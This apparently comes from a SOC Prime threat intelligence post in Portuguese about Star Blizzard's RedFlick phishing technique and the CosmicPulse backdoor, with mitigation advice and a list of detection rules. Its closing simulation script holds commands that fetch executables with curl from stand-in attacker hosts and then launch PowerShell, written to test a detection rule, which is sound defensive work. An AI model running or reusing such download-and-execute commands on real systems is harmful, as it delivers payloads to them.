SOC Prime Bias: Critical

01 Oct 2026 08:18 UTC

Star Blizzard Usa RedFlick para Melhorar a Implementação de Phishing e Malware

Author Photo
SOC Prime Team linkedin icon Seguir
Star Blizzard Usa RedFlick para Melhorar a Implementação de Phishing e Malware
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

O ator russo patrocinado pelo Estado, Star Blizzard, evoluiu seu ofício utilizando a técnica RedFlick para entregar o backdoor CosmicPulse. O ator passou de spear-phishing altamente direcionado para campanhas de phishing automatizado em larga escala usando websites comprometidos. Essas campanhas utilizam métodos sofisticados de entrega, incluindo arquivos VHDX e cargas ocultas dentro de arquivos PDF para evadir a detecção.

Investigação

A Microsoft Threat Intelligence analisou várias ondas de phishing observadas ao longo de 2026, identificando uma transição de cadeias baseadas em ClickFix para tarefas agendadas RedFlick. A investigação detalhou um fluxo de execução em várias etapas envolvendo arquivos LNK, execução de comando local SSH e o uso de WebDAV para recuperação remota de carga. A análise técnica também revelou o uso de esteganografia e criptografia baseada em registro para a carga CosmicPulse.

Mitigação

As organizações devem implementar autenticação resistente a phishing e políticas de acesso condicional para proteger identidades. A proteção de endpoint deve ser configurada com EDR no modo de bloqueio e proteção antivírus em tempo real habilitada. Além disso, implementar regras de redução de superfície de ataque pode prevenir a execução de scripts ofuscados e arquivos executáveis não autorizados.

Resposta

Ao detectar, as equipes de segurança devem utilizar EDR para remediar artefatos maliciosos e investigar tentativas de login suspeitas. Modos de investigação e remediação automatizados devem ser habilitados para reduzir os tempos de resposta. As organizações também devem usar soluções avançadas anti-phishing e purga automática de zero horas para neutralizar comunicações maliciosas recebidas.

Fluxo de Ataque

Ainda estamos atualizando esta parte.

Detecções

Linha de Comando Suspeita Contém Caminho UNC com Executável como Argumento (via cmdline)

Equipe SOC Prime
30 Set 2026

Possível Descoberta de Compartilhamentos de Rede (via cmdline)

Equipe SOC Prime
30 Set 2026

Tentativas Ocultas Suspeitas de Instalação Remota do Instalador MsiExec (via cmdline)

Equipe SOC Prime
30 Set 2026

Conhost LOLBAS (via cmdline)

Equipe SOC Prime
30 Set 2026

Possível Uso de Ferramenta de Tunelamento [Windows] (via cmdline)

Equipe SOC Prime
30 Set 2026

Uso Suspeito de CURL (via cmdline)

Equipe SOC Prime
30 Set 2026

Comando e Controle Suspeito por Solicitação de DNS de Domínio de Topo (TLD) Incomum (via dns)

Equipe SOC Prime
30 Set 2026

IOCs (HashSha256) para detectar: Star Blizzard aprimora phishing e entrega de malware com a técnica RedFlick

Regras de IA SOC Prime
30 Set 2026

IOCs (SourceIP) para detectar: Star Blizzard aprimora phishing e entrega de malware com a técnica RedFlick

Regras de IA SOC Prime
30 Set 2026

IOCs (DestinationIP) para detectar: Star Blizzard aprimora phishing e entrega de malware com a técnica RedFlick

Regras de IA SOC Prime
30 Set 2026

Detectar Execução de PowerShell de Download PDF [Windows Powershell]

Regras de IA SOC Prime
30 Set 2026

Detecção da Técnica RedFlick do Star Blizzard – Tarefas Agendadas e Execução por Linha de Comando [Criação de Processo Windows]

Regras de IA SOC Prime
30 Set 2026

Execução de Simulação

  • Narrativa & Comandos do Ataque: O adversário entrega um e-mail de phishing contendo um link para um arquivo malicioso. Ao interagir, uma sequência é acionada onde curl é utilizado para buscar uma segunda etapa. Para se misturar com os processos do sistema, o comando é elaborado para incluir explicitamente os termos PowerShell, PDF (referenciando a fonte do gatilho), e conhost.exe na string da linha de comando para corresponder à lógica da regra de detecção alvo. O objetivo é executar uma carga decodificada embutida dentro de uma estrutura PDF.

  • Script de Teste de Regressão:

    # Script de simulação para acionar a regra 'Detectar Execução de PowerShell de Download PDF'.
    # Este script constrói uma string de linha de comando que inclui todas as quatro palavras-chave necessárias.
    
    $fakePdfPath = "C:UsersPublicDocumentsinvoice_decoy.PDF"
    $cmd = "cmd.exe /c curl -o payload.exe http://attacker.com/shell.exe && PowerShell.exe -Command `& {Write-Host 'Extracting from PDF...'; Start-Process conhost.exe}"
    
    # Nós executamos via cmd para garantir que conhost.exe seja parte da árvore de processos/contexto de comando
    Start-Process cmd.exe -ArgumentList "/c curl -o data.bin http://evil.com/ & PowerShell -Command `"Extracting from PDF... using conhost.exe`""
  • Comandos de Limpeza:

    # Limpar arquivos gerados durante a simulação
    Remove-Item -Path "C:UsersPublicDocumentsinvoice_decoy.PDF" -ErrorAction SilentlyContinue
    Remove-Item -Path "data.bin" -ErrorAction SilentlyContinue
    Remove-Item -Path "payload.exe" -ErrorAction SilentlyContinue